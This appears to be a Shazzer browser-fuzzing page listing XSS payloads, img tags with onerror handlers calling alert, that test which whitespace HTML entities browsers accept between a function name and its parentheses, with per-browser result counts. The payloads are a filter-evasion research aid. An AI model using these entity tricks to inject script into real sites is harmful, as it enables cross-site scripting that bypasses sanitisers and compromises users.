Entities allowed between function calls
⚠ Browser differences
This vector uses Shazzer's new features to check which entities are allowed between a function call using images. The results are a bit inconsistent yet because I currently wait for page load.
Created byhackvertor
Created Jun 29, 2024
Updated May 27, 2025
Detecting browser...
CategoryEntity Parsing
VisibilityPublic
TypeXSS
CharsetUTF-8
$[data1] placeholderhtml_entities
Template used:
<img src=data: onerror="log$[data1]('html($[data1])')">Sample payloads
<img src=data: onerror="alert ('&emsp13;')"><img src=data: onerror="alert ('&emsp14;')"><img src=data: onerror="alert ('&emsp;')"><img src=data: onerror="alert ('&ensp;')"><img src=data: onerror="alert ('&hairsp;')"><img src=data: onerror="alert ('&MediumSpace;')"><img src=data: onerror="alert ('&nbsp;')"><img src=data: onerror="alert
('&NewLine;')"><img src=data: onerror="alert ('&NonBreakingSpace;')"><img src=data: onerror="alert ('&numsp;')"><img src=data: onerror="alert ('&puncsp;')"><img src=data: onerror="alert	('&Tab;')"><img src=data: onerror="alert  ('&ThickSpace;')"><img src=data: onerror="alert ('&ThinSpace;')"><img src=data: onerror="alert ('&thinsp;')"><img src=data: onerror="alert ('&VeryThinSpace;')">Fuzz results
Chrome 145.0.0.0 desktop Windows NT 10.0
Updated17 Feb 2026
Found 16 results
Loading...
Chrome 143.0.0.0 desktop macOS 10.15.7older version
Updated28 Jan 2026
Found 16 results
Loading...
Firefox 148.0 desktop Windows NT 10.0
Updated23 Feb 2026
Found 16 results
Loading...
Firefox 147.0 desktop Linuxolder version
Updated1 Feb 2026
Found 16 results
Loading...
Firefox 127.0 desktop macOS 10.15older version
Updated29 Jun 2024
Found 4 results
Loading...
Microsoft Edge 145.0.0.0 desktop Windows NT 10.0
Updated18 Feb 2026
Found 16 results
Loading...
Safari 17.5 mobile iOS 17.5.1
Updated30 Jun 2024
Found 6 results
Loading...
Safari 17.4 desktop macOS 10.15.7older version
Updated29 Jun 2024
Found 2 results
Loading...